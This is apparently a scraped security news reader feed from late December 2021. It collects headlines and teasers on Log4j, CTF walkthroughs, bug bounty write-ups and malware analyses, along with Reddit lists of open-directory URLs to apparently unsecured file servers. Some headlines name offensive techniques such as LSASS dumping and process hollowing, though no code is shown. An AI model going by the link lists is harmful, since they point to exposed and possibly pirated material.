    ZN600电信光猫分析 —— 初识 by ourren 写给研发同学的富文本安全过滤方案 by ourren Tenda AX12路由器设备分析(二)之UPnP协议 by ourren 一款通过污点追踪发现Jsp webshell的工具 by ourren 快速探测目标防火墙出网端口的工具化实现 by ourren 聊聊配置文件 RCE 这件事 by ourren 扫描器性能分析案例 by ourren 内核态eBPF程序实现容器逃逸与隐藏账号rootkit by ourren 软件供应链安全发展洞察报告(2021年) by ourren 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    I wrote a replacement for Pyrasite to inject code into Python processes on Kubernetes
    submitted by /u/nyellin [link] [comments]  ( 1 min )
    Bootkit samples
    submitted by /u/hardenedvault [link] [comments]
  • Open

    TryHackMe | CTF | Walkthrough | Raven
    Checkout this virtual machine on TryHackMe. LogIn on TryHackMe, go to rooms → raven1he. Link: https://tryhackme.com/room/raven1he Continue reading on Medium »  ( 3 min )
  • Open

    Upgrade your OSINT investigations with Maltego
    What is Maltego anyway? Continue reading on Medium »  ( 1 min )
    OSINT — Sakura (TryHackMe walktrough)
    The OSINT Dojo recently found themselves the victim of a cyber attack. It seems that there is no major damage, and there does not appear… Continue reading on Medium »  ( 2 min )
  • Open

    FreeBuf早报 | 微信小程序调用个人信息需授权;亚马逊 Alexa 语音助手越界
    2022年2月21日起,小程序访问蓝牙、通讯录,以及添加日历事件,必须经过用户授权。  ( 1 min )
    威胁狩猎架构体系架构与实践 | CIS 2021 Spring·春日版大会议题初探
    威胁狩猎是目前业内公认的最有效的主动型安全解决方案之一,可最大限度降低网络攻击对企业的危害。  ( 1 min )
    T-Mobile称:用户数据泄露由SIM卡交换攻击引起
    美国电信运营商T-Mobile发生了一起数据泄露事件,有不明数量的客户遭受了SIM交换攻击。
    DevSecOps建设之白盒续篇
    探索一款既能够满足企业内部自动化审计需求、又能够辅助白帽子日常快速挖掘漏洞的工具。  ( 4 min )
    IoT蜜罐展示物联网设备存在的网络威胁
    蜜罐历来被用作诱饵设备,帮助研究人员更好地了解网络上威胁的动态及其影响。  ( 1 min )
    超1200个网站使用MitM钓鱼工具包,允许网络犯罪分子绕过 2FA 身份验证
    中间人网络钓鱼工具包是不需要人工操作的实时网络钓鱼工具包,因为一切都是通过反向代理自动完成。  ( 1 min )
    ThinkPHP5反序列化利用链总结与分析
    本文将总结分析ThinkPHP5.0和5.1中的反序列化利用链,一方面以备不时之需,另一方面算是对php反序列化的深入学习。  ( 6 min )
    应急响应-Yara规则木马检测
    Yara是一个基于规则的恶意样本分析工具,可以帮助安全研究人员和蓝队分析恶意软件,并且可以在应急取证过程中自定义检测规则来检测恶意软件。  ( 1 min )
    地铁安防门被曝存在多个严重的安全漏洞
    这些漏洞可能允许远程攻击者绕过身份验证要求、篡改金属探测器配置,甚至在设备上执行任意代码。  ( 1 min )
    大型车企隐秘接口连续被泄露 我们该如何盘点公司资产
    大型甲方企业如何做资产盘点
    《2021企业安全运营实践报告》发布:从被动防御到主动出击
    从被动转主动,企业安全运营体系已牢牢抓住主动权。  ( 1 min )

  • Open

    Why haven't African countries invested much in the Cybersecurity Industry?
    Most of the African countries don't know what Cybersecurity is!. Some know it but they have not yet faced a serious risk!. This is the main reason why countries like Uganda don't embrace Cybersecurity and Technology at large and this causes a serious threat to a country shortly because technology is becoming unavoidable! submitted by /u/Cyber_Catalyzer [link] [comments]  ( 1 min )
    Question about java deobfuscation HTB module
    hi all, I am doing the "Javascript deObfuscation" module on hackthebox platform (very very nice!) I read this: As previously mentioned, the above-used method of obfuscation is packing. Another way of unpacking such code is to find the return value at the end and use console.log to print it instead of executing it. Can anyone explain me this? Possibly with an example? Thankyou submitted by /u/g-simon [link] [comments]  ( 1 min )
    Nessus says IPMI hashes are disclosed, but metasploit's ipmi_dumphashes returns nothing?
    I see this fairly frequently during pentests where Nessus raises an issue about IPMI Hash Disclosure, but of course doesn't show any hashes. When using ipmi_dumphashes I get nothing in response. Does anyone know any other utilities to check for IPMI hash disclosure and confirm if Nessus is giving me a false positive? submitted by /u/security_intern [link] [comments]  ( 1 min )
    Someone is trying to access my accounts...what to do?
    I believe someone is in possession of my personal information and is trying to access my accounts. Over the last few days I have been prompted to confirm my identity in Venmo and Paypal. I also just received notice that someone is trying to access my Twitter account in Ecuador. ​ I have changed my Google password and all of my financial passwords. I have not detected any fraudulent activity on any of my cards, but am at a loss what to do next. Should I simply change every password I have? Is there a better course of action? ​ The only way I can think they may have gotten my information was is that I pirate tv shows on my personal computer. It recently blue screened and I had to wipe everything. ​ Pretty much at a loss for what to do at this step as it seems someone is attempting to access my account, but at this point hasn't been able to bypass 2fa or basic security questions. submitted by /u/LechronJames [link] [comments]  ( 2 min )
    Looking for advice and recommendations for RMM software.
    We're dealing with sensitive and juicy data, protected by strict regulations, in an environment in an environment where we could be targeted for being a little start up with access to some very interesting things. I'm of two minds. . . On the one hand, just the presence of RMM is a potential vuln (especially giving some cloud service admin access to my devices). On the other hand, I want to be able to keep track of stuff (and audit my users, who are scattered around the country, at least quarterly). I need an RMM solution for MacOS and Windows both that has a good track record and (hopefully) a reasonably open audit history. I'd feel more comfortable with something where I can host my own server, not have it call home somewhere in the cloud (I realise that's probably a nonstarter, at least as far as MacOS is concerned). I was moderately excited about Tactical RMM, but after what just happened with them, I'm a "hell no!" on that one. Any thoughts on this? submitted by /u/thebardingreen [link] [comments]  ( 1 min )
    Best password manager?
    Hey security folks help me out to choose best password manager. Let me know which password manager you are using and why? What's the best password manager betweens 1password vs dashlane vs bitWarden? submitted by /u/noob_bug_hunter [link] [comments]  ( 4 min )
  • Open

    PrintNightmare and SSH Tunnels
    submitted by /u/m_edmondson [link] [comments]
    Flagpro malware is threatening enterprises and is backed by Chinese hackers
    submitted by /u/Gengar-boy [link] [comments]  ( 1 min )
    How I built the PoC for the Log4j zero-day security vulnerability
    submitted by /u/melbadry9 [link] [comments]
  • Open

    open directories containing music (4)
    01 - Original Sound Track Tokusatsus - ddl.tokusatsu-fansub.fr > Musiques > Tokusatsus Collection MP3 OST e BGM > 01 - Original Sound Track Tokusatsus Index of /criticalmasscatania/data/media (inventati.org) Index of /mp3 (pinballnirvana.com) Index of /tunes (syer.net) Index of /Music Index of /ftp/MP3 (bahiabeachtenerife.com) submitted by /u/International_Milk_1 [link] [comments]  ( 1 min )
    open directories containing music (3)
    http://wrobradio.com/mp3s/ http://www.crypthome.com/members/Belle/vwavvv/ http://www.ibiblio.org/pha/dawk/Audio/ http://www.crescentmoon.club/All%20Music/ http://files.sfenyc.com/Music/?C=M;O=A http://woodrosepsp.com/judy/MUSIC/ submitted by /u/International_Milk_1 [link] [comments]  ( 1 min )
    open directories containing music (2)
    http://www.captainspud.com/stuff/music/ http://cvltnation.com/wp-content/audio/ https://anorg.chem.uu.nl/people/staff/FrankdeGroot/woXS/ https://dl.msbmusic.ir/d1/1398/Music/09/ http://tka4.org/tka4/articles/Music%20Listening/sound/ https://www.iutbayonne.univ-pau.fr/~lopis/BBand/Divers/ submitted by /u/International_Milk_1 [link] [comments]  ( 1 min )
    open directories containing music (1)
    https://www.acroche2.com/mid_jazz/ http://148.72.150.188/archive/access/audio/ http://91.121.145.85/panel/136/henk/Blue%20Note%20The%20Ultimate%20Jazz%20Collection/Blue%20Note%20-%20The%20Ultimate%20Jazz%20Collection%20-%20CD1/ http://pix.klunch.com:555/mp3/ http://www.doctorwhofanshop.com/mov/ https://ia801002.us.archive.org/27/items/tntvillage_381703/John%20Coltrane%20-%20Legacy%20%28Impulse%21%29%20%281955-67%29%20%28Disc%201%20-%20Harmonic%20%26%20Melodic%29/ submitted by /u/International_Milk_1 [link] [comments]  ( 1 min )
    ARCHIVES OF INTERNET RADIO SHOWS. Music and interviews seemingly. Might be easier to check parent directory first.
    submitted by /u/International_Milk_1 [link] [comments]  ( 1 min )
    Various operating system ISOs
    submitted by /u/Plastic_Preparation1 [link] [comments]
    An Audiobook for every novel in the Nero Wolfe detective series by Rex Stout
    submitted by /u/HGMIV926 [link] [comments]  ( 1 min )
    Music. Hmm. Some of it is the original artists at least in the first directory. The rest seems to be covers and maybe original material by some french band. There is a trio mentioned in parent folder. But in open directory folders which have people's names, there are more than 3 folders. Whew.
    submitted by /u/International_Milk_1 [link] [comments]  ( 1 min )
    classical music in some of the directories.
    submitted by /u/International_Milk_1 [link] [comments]
    Telegram bot-OD downloader
    I am thinking of creating a telegram bot that crawls and downloads OD, is that already done? Is it a good idea? And could I be legally accused with anything? submitted by /u/_NullPointerEx [link] [comments]  ( 3 min )
  • Open

    HOW I AM ABLE TO CRASH ANYONE’S MOZILLA FIREFOX BROWSER BY SENDING AN EMAIL
    Hi, Hope you guyz are doing well, Here is the story of how i am able to crash anyone’s mozilla firefox by just sending a single email… Continue reading on Medium »  ( 1 min )
    HOW I GOT MY FIRST RCE WHILE LEARNING PYTHON
    Hi, Continue reading on Medium »  ( 1 min )
    Jet Protocol Upgrade Bug Patch Disclosure
    On Dec 21st, we performed an ad hoc upgrade to our mainnet program that introduced a critical vulnerability that was quickly discovered… Continue reading on Jet Protocol »  ( 1 min )
    How To Hack Any Website
    [PART -3 Exploiting Trust] Continue reading on System Weakness »  ( 12 min )
    LENOVO OPEN REDIRECTION
    Hello Hackers!! Continue reading on Medium »  ( 1 min )
    OTP bypass via response manipulation
    Hello everyone I’m Jan Jeffrie Salloman, I started bug hunting 1 year ago. This writeup is about an OTP bypass using response manipulation… Continue reading on Medium »  ( 1 min )
    Polygon Lack Of Balance Check Bugfix Postmortem — $2.2m Bounty
    Whitehat Leon Spacewalker reported a critical vulnerability in Polygon on December 3. Continue reading on Immunefi »  ( 4 min )
  • Open

    Log4j CVE-202144228
    Krisp disclosed a bug submitted by karthik86: https://hackerone.com/reports/1431624
    SQL Injection leads to retrieve the contents of an entire database.
    BlockDev Sp. Z o.o disclosed a bug submitted by u-itachi: https://hackerone.com/reports/1002641
  • Open

    Help with installing Autopsy
    submitted by /u/UserNo007 [link] [comments]  ( 1 min )
    Forensic Analysis of USB tripwire that shreds your LUKS Header
    submitted by /u/maltfield [link] [comments]  ( 1 min )
    Tips on GCFA (SANS FOR508) certification
    Hello everyone, I've just registered for GCFA (SANS FOR508). What is the major tips that anyone can share for this certification? One feedback that I heard from my colleagues that took it couple of months back was that the practice papers doesn't have much similarity to the actual exam. Which is kind of a concern as I have a GCIH (SANS SEC504) and my practice papers are very similar to the actual exam. Appreciate any feedback from anyone who has recently attempted the certification, thanks! submitted by /u/Writtensine6 [link] [comments]  ( 3 min )
  • Open

    SecWiki News 2021-12-29 Review
    业务安全发展洞察报告 2021 by ourren 消费级物联网安全基线 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    树莓派专刊---搭建kali环境
    拿起你吃灰的树莓派,做点有意义的事情! 面向想低成本学习信息安全的小白师傅们,一起动起来吧!  ( 1 min )
    树莓派专刊---搭建kali环境
    拿起你吃灰的树莓派,做点有意义的事情! 面向想低成本学习信息安全的小白师傅们,一起动起来吧!  ( 1 min )
    FreeBuf早报 | 在线密码管理器LastPass被大规模撞库;好购App被法院认定侵害隐私权
    全球动态1. Log4j 2.17.1 现已发布,修复了新的远程代码执行错误Apache 发布了 Log4j 版本 2.17.1,修复了 2.17.0 中新发现的远程代码执行 (RCE) 漏洞,编号为 CVE-2021-44832。[外刊-阅读原文]2. 好购App未经许可读取用户手机剪贴板内容,法院认定侵害隐私权手机用户小林(化名)在使用好购App时发现,该App未经同意,擅自监测、收集其手机剪  ( 1 min )
    《信息安全技术 信息系统密码应用设计技术要求》(征求意见稿)发布
    《征求意见稿》提出了信息系统密码应用方案设计技术的建议,为开展信息系统密码应用方案设计提供指导参考。
    2026年,数据丢失防护市场规模将达到 62.65 亿美元
    2026年,数据丢失防护市场规模将达到62.65亿美元。  ( 1 min )
    既存安全风险又涉及侵权,三星应用商店现风险流媒体应用
    这些软件伪装成已停止运营的盗版影视应用程序——ShowBox,目前已在多个用户设备上触发了Play Protect安全警告。
    等保2.0与商密应用产品相关的48个问题合集(中)
    进入等级保护2.0时代,根据信息技术发展应用和网络安全态势,不断丰富了制度内涵、拓展保护范围、完善监管措施,逐步健全网络安全等级保护制度政策、标准和支撑体系。  ( 1 min )
    上云时代,企业云安全审计可以这么做!
    上云时代,企业应结合自身安全合规要求与公有云特性,制定云安全审计检查项;并有效利用公有云配置审计服务,提升云上审计自动化水平。  ( 1 min )
    重磅 | 【 2021中国白帽子调查报告】正式发布
    未来白帽子应该多多尝试过往不熟知、不擅长的漏洞领域,更新挖洞知识与技能。  ( 1 min )
    域内提权漏洞CVE-2021-42287与CVE-2021-42278原理分析
    综上所述,这个洞刚开始叫nopac其实就是针对跨域时的攻击,实战意义不大。  ( 3 min )
    线密码管理器LastPass被大规模撞库
    在线密码管理器LastPass承认,攻击者对其用户进行了大规模的撞库攻击,试图访问他们的云托管密码库。
  • Open

    BountyHunter HackTheBox Walkthrough
    Bounty hunter is a CTF Linux machine with an Easy difficulty rating on the Hack the Box platform. So let’s get started and take a The post BountyHunter HackTheBox Walkthrough appeared first on Hacking Articles.  ( 6 min )
  • Open

    Log4jscanner: A Log4j vulnerability filesystem scanner and Go package
    Article URL: https://github.com/google/log4jscanner Comments URL: https://news.ycombinator.com/item?id=29723953 Points: 3 # Comments: 0  ( 3 min )
  • Open

    CTF Write-Up: Shiftpocalypse
    CTF challenge available at ctf-mystiko.com.  ( 3 min )
    CTF Write-Up: Hell Yeah!
    CTF challenge available at ctf-mystiko.com.  ( 2 min )
    Story of a weird CSRF bug
    Heyyy Everyoneeee,  ( 5 min )
    Forensics — Memory Analysis with Volatility
    Recently, I’ve been learning more about memory forensics and the volatility memory analysis tool. To get some more practice, I decided to…  ( 6 min )
    Log4Shell Simplified : All you need to know about CVE-2021-44228
    Collection of all the required details to understand Log4shell (CVE-2021–44228 ) vulnerability  ( 4 min )
    TryHackme — Introduction to Django
    CTF  ( 2 min )
    Bug Bounty Tool List
    Bug Bounty Tool List Which are useful for Hunting  ( 1 min )
  • Open

    CTF Write-Up: Shiftpocalypse
    CTF challenge available at ctf-mystiko.com.  ( 3 min )
    CTF Write-Up: Hell Yeah!
    CTF challenge available at ctf-mystiko.com.  ( 2 min )
    Story of a weird CSRF bug
    Heyyy Everyoneeee,  ( 5 min )
    Forensics — Memory Analysis with Volatility
    Recently, I’ve been learning more about memory forensics and the volatility memory analysis tool. To get some more practice, I decided to…  ( 6 min )
    Log4Shell Simplified : All you need to know about CVE-2021-44228
    Collection of all the required details to understand Log4shell (CVE-2021–44228 ) vulnerability  ( 4 min )
    TryHackme — Introduction to Django
    CTF  ( 2 min )
    Bug Bounty Tool List
    Bug Bounty Tool List Which are useful for Hunting  ( 1 min )
  • Open

    Implant.ARM.iLOBleed.a | Padvish Threats Database
    submitted by /u/dmchell [link] [comments]
  • Open

    OSINT Cheatsheet: A Mindmap for Your Investigation
    This is a guest post by Steve Hall (https://twitter.com/shall_1) Continue reading on Medium »

  • Open

    Red & Blue-Team Quick Reference Gitbooks
    ​ https://preview.redd.it/fr6me9amad881.png?width=2250&format=png&auto=webp&s=b41dfae9c724d1f9519dca8fb2317b91d4c8c778 Hi everyone! I would like to share with you one of my gitbooks, focused on DFIR, Malware and Blue-Team in general. Is a WIP in progress. Im actually adding more and more things while myself learn along the way. 📘 Hunter - Jorge Testa There you have my Red-Team version. WIP too. 📕 Tryharder - Jorge Testa Hope you like it! submitted by /u/J-Testa [link] [comments]  ( 1 min )
    Microsoft Defender for Identity security alert lateral movement playbook
    submitted by /u/dmchell [link] [comments]
  • Open

    Third Log4j RCE Vulnerability Discovered in Apache Logging Library [With Technical details & PoC]
    submitted by /u/Gorkha56 [link] [comments]
    DFIR or AppSec?
    Hi everyone, I'm currently a Computer Science student and I would love to work in cybersecurity. There are 2 roads that I want to explore and I was wondering if you could help me decide which career path to choose as I really like both of them equally: Start as a SOC Analyst and specialize in DFIR Work for a couple of years as a software engineer, after that transition to AppSec Thank you and really looking forward to your answers! submitted by /u/cyberprime24 [link] [comments]  ( 1 min )
    Most comprehensive(or better in another way) list of default creds?
    I can see there are a lot of sites that list default creds, but they seem to be missing a lot like default setting web apps. Usually it doesn't take too long to google, but not always. What are your favorite lists for this? Is it better to just google each time or have you found any gems out there? submitted by /u/Euphorinaut [link] [comments]  ( 1 min )
    "Pentesting" a friends web app, it's a bit scary..
    Hey everyone! First of all I'm not a pentester, I'd like to be one one day but for now I remain a noob who is trying harder every day. Now that thats out of the way let me start.. So I met up with a friend of mine recently who had an idea for a web app and hired a company to develop it. It's still in development but the other day he showed me the progress and asked me for my general opinion on the idea, status of the website and since he also receives regular backups of the code, he asked me to take a quick look at it. It seemed to be built on top of WordPress, nothing fancy but since I'm interested in Pentesting and Web application security I took a quick glance at interesting files like login, etc... Now again, I'm not a web dev or have great skills in php or js but I can read some o…  ( 5 min )
    Has anyone ever read Kevin Mitnick’s The Art of Invisibility? How useful was the advice?
    It’s a book released in 2017 that details how to secure your OPSEC. A lot of 5 star reviews on amazon, can anyone summarize the chapters? There were 16. submitted by /u/Original_Ad_1103 [link] [comments]  ( 3 min )
    In what fields of InfoSec is there potential for entrepreneurship?
    I am currently a high school student passionate about InfoSec studying Network+ material, and as someone who wants to own a business one day I was interested in which specific areas of this field there is startup potential. Of course, I plan on gaining plenty of experience in jobs before contributing my own innovation so your answers will allow me to calibrate my learning/career path to be more effective for my goals. submitted by /u/Connect_Estate_8617 [link] [comments]  ( 4 min )
  • Open

    New Log4j2 vulnerability
    Article URL: https://nvd.nist.gov/vuln/detail/CVE-2021-44832 Comments URL: https://news.ycombinator.com/item?id=29718845 Points: 97 # Comments: 41  ( 3 min )
    Important: Security Vulnerability CVE-2021-44832
    Article URL: https://logging.apache.org/log4j/2.x/ Comments URL: https://news.ycombinator.com/item?id=29718814 Points: 2 # Comments: 0  ( 5 min )
    Log4j Vulnerability Scanning Tool from Jfrog
    Article URL: https://github.com/jfrog/log4j-tools Comments URL: https://news.ycombinator.com/item?id=29715230 Points: 1 # Comments: 0  ( 6 min )
  • Open

    Important: Security Vulnerability CVE-2021-44832
    Article URL: https://logging.apache.org/log4j/2.x/ Comments URL: https://news.ycombinator.com/item?id=29718814 Points: 2 # Comments: 0  ( 5 min )
  • Open

    Intercepting Google CSE resources: automate Google searches with client-side generated URIs (for…
    Introduction Continue reading on Medium »  ( 11 min )
  • Open

    New Log4j CVE - CVE-2021-44832. Another JNDI RCE. Fixed in latest release.
    submitted by /u/emmainvincible [link] [comments]  ( 1 min )
    Turning bad SSRF to good SSRF: Websphere Portal
    submitted by /u/Mempodipper [link] [comments]
    IRIS - A web collaborative platform for incident response analysts allowing to share investigations at a technical level
    submitted by /u/Maijin [link] [comments]
    Pet surveillance with Falco
    submitted by /u/MiguelHzBz [link] [comments]
    Using laser speckle patterns to see keypresses etc.
    submitted by /u/anfractuosus [link] [comments]  ( 1 min )
    Integrating Canary Tokens with Microsoft Sentinel SIEM
    submitted by /u/m_rothe [link] [comments]
    PHP LFI with Nginx Assistance
    submitted by /u/dL2Hj4wR [link] [comments]  ( 1 min )
    V8 Heap pwn and /dev/memes - WebOS Root LPE
    submitted by /u/DavidBuchanan [link] [comments]
    Encoding.Tools (alternative to CyberChef and Burp Suite Encoder)
    submitted by /u/mehaase [link] [comments]
  • Open

    Hack Us Will You?
    Delorians, Continue reading on Medium »  ( 1 min )
    Astroport Boosts Bug Bounty to $3m, Takes Top Leaderboard Spot
    Astroport has just doubled its critical bug bounty reward from $1.5m to $3m, making it the largest bounty on Immunefi’s platform, beating… Continue reading on Immunefi »  ( 1 min )
    Hunting for Bugs in File Upload Feature:
    In this blog, I will be listing down some file upload Vulnerability such RCE, SSRF, CSRF, XSS and many more such vulnerabilities. Continue reading on Medium »  ( 4 min )
    SSRF in Align Technology, Inc.
    Hi everyone Align Technology, Inc. is a manufacturer of 3D digital scanners and the Invisalign clear aligners used in orthodontics.It is… Continue reading on Medium »  ( 1 min )
    [Campaign] — HappyLand testnet invitation!
    HappyLand Testnet will arrive at the end of December and we are super thrilled to welcome you. This is an opportunity to let you imagine… Continue reading on Medium »  ( 2 min )
    Bypassing HttpOnly with phpinfo file
    While doing Web Application assessment with Higgsx, We found stored Cross-Site Scripting(XSS) which was a nice finding but we could not… Continue reading on Medium »  ( 1 min )
    CVE-2021–38314 Leads to Sensitive Information Disclosure
    Hello Hackers! Continue reading on Medium »  ( 1 min )
    How having a student mail can help you in Info-sec.
    Hello Everyone, I’m Vishal & It’s my first ever blog . So if you found any grammatical error or something missing don’t pardon me, Instead… Continue reading on Medium »  ( 5 min )
    Bounty Evaluation GitHub = $15,000 US Dollars | Rate Limit
    I found the bug on GitHub website where, I bypassed the login authentication. In this walk through I will show it was done. Let’s… Continue reading on Medium »  ( 2 min )
    Bug Report Update!
    We are very grateful for the overwhelming support our community has shown for our ongoing testnet & bugbounty programme. Our bugbounty… Continue reading on Medium »  ( 2 min )
    Bug Bounty Programs for Blockchain Projects
    The list of methods and strategies applied by hackers to compromise the security of their targets is constantly expanding and they… Continue reading on Medium »  ( 2 min )
  • Open

    SecWiki News 2021-12-28 Review
    连载:演化的高级威胁治理(四) by ourren 连载:演化的高级威胁治理(三) by ourren 连载:演化的高级威胁治理(二) by ourren 连载:演化的高级威胁治理(一) by ourren SecWiki周刊(第408期) by ourren 透明度PK国家安全?美国的VEP政策改革呼声再起 by ourren 漏洞披露是一个抗解问题--协同漏洞披露(CVD)简述 by ourren THINE:针对时序异质信息网络的表示学习 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    Dell Driver EoP (CVE-2021-21551)
    submitted by /u/nanabingies [link] [comments]
  • Open

    【安全通报】Auerswald COMpact 5500R PBX 固件多个后门漏...
    近日,RedTeam Pentesting 公布了 Auerswald COMpact 5500R PBX 固件中的多个后门漏洞。攻击者可通过这些后...  ( 1 min )
    【安全通报】Apache APISIX Dashboard 身份验证绕过漏洞(C...
    近日,网络上出现 Apache APISIX Dashboard 身份验证绕过漏洞,攻击者可通过该漏洞绕过身份验证过程并通过...  ( 1 min )
  • Open

    企业级国产免费蜜罐HFish内测版先览
    有幸从HFish产品小姐姐那儿获得了内测资格,和大家分享一下个人使用心得,以及部分落地方法。结尾有彩蛋哟。  ( 1 min )
    告别脚本小子系列丨JAVA安全(1)——JAVA本地调试和远程调试技巧
    首期系列课程主要分享关于java安全相关内容  ( 1 min )
    【原创】VulnHub靶机实战:CyNix: 1
    VulnHub靶机实战:CyNix: 1  ( 1 min )
    全球最大图片服务公司遭勒索攻击、《蜘蛛侠》新片盗版包含挖矿木马|12月28日全球网络安全热点
    &lt;section&gt;&lt;img src=&quot;https://image.3001.net/images/20211228/1640679742_61cac93e5aadba5c4e4ea.jpg!small  ( 1 min )
    阿尔巴尼亚总理就数据泄露致歉
    在数十万阿尔巴尼亚公民的个人数据在互联网上泄露后,阿尔巴尼亚总理就此事公开道歉。
    Apache HTTP Server 2.4.52 发布,修复关键漏洞
    建议用户和管理员查看 Apache 公告,并尽快更新他们的版本,以免遭受不必要的潜在攻击。  ( 1 min )
    FreeBuf早报 | 近七成网民感到被算法算计;阿尔巴尼亚总理就数据泄露致歉
    北大互联网发展研究中心发布的《中国公众“大安全”感知报告》显示,近七成公众表示担心账号和个人信息泄露。  ( 1 min )
    威联通NAS设备在圣诞期间遭到了勒索攻击
    eCh0raix 勒索软件攻击者似乎都在系统管理员组中创建了一个账号,从而加密NAS 系统上的所有文件。  ( 1 min )
    物流巨头DW Morgan暴露了100 GB 客户数据
    Website Planet安全团队发现了一个配置错误的亚马逊S3“存储池”,池中包含约250万个文件,大小超过100GB。  ( 1 min )
    全球最大图片服务公司Shutterfly遭Conti 勒索软件攻击
    Shutterfly成立于1999年,并声称自己的在线图片存储是世界上最大的,拥有70PB的数据,约16亿张图片。  ( 1 min )
    Unity游戏反破解之道:代码破解与资源窃取,从攻击风险入手
    本文将重点围绕“反破解”讲述这些安全风险以及如何对unity游戏进行全方位的矩阵化保护升级。  ( 1 min )
    API声明文件Swagger Injection攻击
    开发者应将API声明文件视作不可信输入源对待,并在自动化代码生成环节添加相应的安全管控手段。  ( 1 min )
    基于free5gc+UERANSIM的5G SMF及UPF 网元安全需求分析
    本文对《3GPP安全保障规范(SCAS)》中定义的SMF和UPF网元安全需求进行了报文和代码分析。  ( 6 min )
  • Open

    Looking back at 2021 in cybersecurity with Netsparker
    As 2021 draws to a close, it is time for our customary round-up of the year’s most popular and relevant posts on the Netsparker blog, with a sprinkling of last-minute news and predictions for the coming year. READ MORE  ( 4 min )
  • Open

    How I Bypassed Netflix Profile Lock?
    Hi hackers,  ( 3 min )
    Analysis of Poetrat malware
    Hashes  ( 3 min )
    TryHackme LFI Writeup
    How to find and exploit LFI  ( 3 min )
    How I hacked into one of India’s biggest online book stores(RCE and more)
    This article is going to be about how I found my 1st RCE on one of India’s biggest e-commerce sites(+ a few more bugs).  ( 5 min )
  • Open

    How I Bypassed Netflix Profile Lock?
    Hi hackers,  ( 3 min )
    Analysis of Poetrat malware
    Hashes  ( 3 min )
    TryHackme LFI Writeup
    How to find and exploit LFI  ( 3 min )
    How I hacked into one of India’s biggest online book stores(RCE and more)
    This article is going to be about how I found my 1st RCE on one of India’s biggest e-commerce sites(+ a few more bugs).  ( 5 min )
  • Open

    google drive movie link
    [ Removed by reddit in response to a copyright notice. ] submitted by /u/International_Milk_1 [link] [comments]  ( 1 min )
    186 persiangig OD Sites Potential NSFW
    http://aailaar.persiangig.com/ http://aamiri.persiangig.com/ http://agrandsimanmag.persiangig.com/ http://ahd666.persiangig.com/ http://albus.persiangig.com/ http://alexpk.persiangig.com/ http://alham.persiangig.com/ http://alishahbazi.persiangig.com/ http://alisharghi.persiangig.com/ http://alma85.persiangig.com/ http://aminatabak.persiangig.com/ http://aminnice.persiangig.com/ http://amir1410.persiangig.com/ http://amirsaman.persiangig.com/ http://amomasoud.persiangig.com/ http://aroonsat.persiangig.com/ http://arshiya.persiangig.com/ http://ascut3.persiangig.com/ http://ashinaazar.persiangig.com/ http://askari56.persiangig.com/ http://azarnoosh.persiangig.com/ http://azg198.persiangig.com/ http://baroun82.persiangig.com/ http://baxe0181.persiangig.com/ http://ben…

  • Open

    Windows resolves/"connects" to external IP even without internet access?
    I was poking around in my router the other day and found something I can't really understand: my Windows machine tried to connect to an external IP address (13.?.?.?) when there was no internet access and no DNS. My modem's internet cable was disconnected and both modem and router were rebooted before I powered up the Windows machine. All DNS caches should be empty. The router connections page shows 1 connection from my Windows machine to 13.?.?.? with status SYN_SENT. Of course, it didn't connect, but how did it know what external IP to try without DNS? The IP is a Microsoft one but I didn't write down what it was (and I didn't save search history) since I initially didn't think it was strange. I tried repeating the same thing several times, but never saw anymore external IPs (but a bunch of 198.x.x.x which is what I'd expect when internet is down). The only difference the first time is that it was installing a previously downloaded Windows update. Is this unusual? Is MS known to go directly to IP addresses like this? This machine only has Windows installed and drivers from Windows Update, so not much on here. submitted by /u/Vivid-Elk-8337 [link] [comments]  ( 2 min )
    Linux servers security
    Hi, We have 100+ Linux servers running with apache/tomcat and Nginx, and a few servers are public-facing with ip control. I am trying to see if any open source tool to scan all 100+ servers on a daily basis and report if any vulnerabilities. Thanks. submitted by /u/Prestigious-Yam-3510 [link] [comments]  ( 1 min )
    Best IT backgrounds to prepare for InfoSec
    I am currently a computer science student and I want to pursue a career in cybersecurity but I know that in order to get into security I will need some kind of experience before I can get a job in the field. I'm just wondering what are the best IT backgrounds to have or things that I should focus on that would help me develop skills needed for security careers. I know it depends on what kind of focus I want in security and for now I'm thinking more towards the defensive side like engineer maybe but I would prefer having answers based in either roles (attack and defense). So to rephrase it a bit better I wanna know what are the best tenporary jobs that I could do to develop skills needed to switch into security (soft dev, web dev, data sci, etc...)? submitted by /u/iTsObserv [link] [comments]  ( 7 min )
  • Open

    Playing around COM objects - PART 1
    submitted by /u/dmchell [link] [comments]
    Dumping LSASS with Duplicated Handles
    submitted by /u/dmchell [link] [comments]
    snovvcrash/NimHollow: Nim implementation of Process Hollowing using syscalls (PoC)
    submitted by /u/dmchell [link] [comments]
  • Open

    Winning the Impossible Race – An Unintended Solution for Includer’s Revenge / Counter (hxp 2021)
    submitted by /u/Caustic66 [link] [comments]
    remote Chaos Computer Congress Streaming
    submitted by /u/mubix [link] [comments]
    A Deep Dive into DoubleFeature: Equation Group's Post-Exploitation Dashboard
    submitted by /u/Megabeets [link] [comments]
  • Open

    Why did my last movie post dissappear?
    submitted by /u/International_Milk_1 [link] [comments]
    If you'll allow me-for movie or tv show fans.
    There might be one person out there who doesn't know this. So let's say you download a movie, expecting it to be in the english language, but find that Harrison Ford is speaking Persian, and it doesn't even sound like Mr F In whatever player you use, go to the audio option , and check if there is alternative track. To make sure there is an english language track, before downloading, copy the link of the movie/tv episode, and open in your player. Then you can check before downloading. submitted by /u/International_Milk_1 [link] [comments]  ( 2 min )
    I'd like to make a motion for a couple of new flairs: "Junk Science" and "Conspiracy"
    submitted by /u/brother_p [link] [comments]  ( 1 min )
  • Open

    Ethical Hacking Roadmap and Resources
    Checklist for the things that one has to learn while learning Linux: Shell, Navigation, File System, Redirection, Permissions, Processes… Continue reading on Medium »  ( 4 min )
    Full account takeover vulnerability in Minecraft
    Continue reading on Medium »  ( 2 min )
    VULNERABILIDADES WEB 7.0
    C R O S S - S I T E S SCRIPTING Continue reading on Medium »  ( 6 min )
    OSINT Research With Recon-ng
    This piece goes over the basics of Recon-ng and how to use it to facilitate OSINT research! I’ll be covering two modules: google_site_web… Continue reading on Medium »  ( 4 min )
    Unlucky Story, Judge Duplicate, and Only Get a Thank You. But It makes Me smile.
    This is from my local bounty program in my country, Indonesia. I found some vulnerabilities in an e-commerce website and I think it would… Continue reading on Medium »  ( 1 min )
    From Simple Recon to Reflected XSS
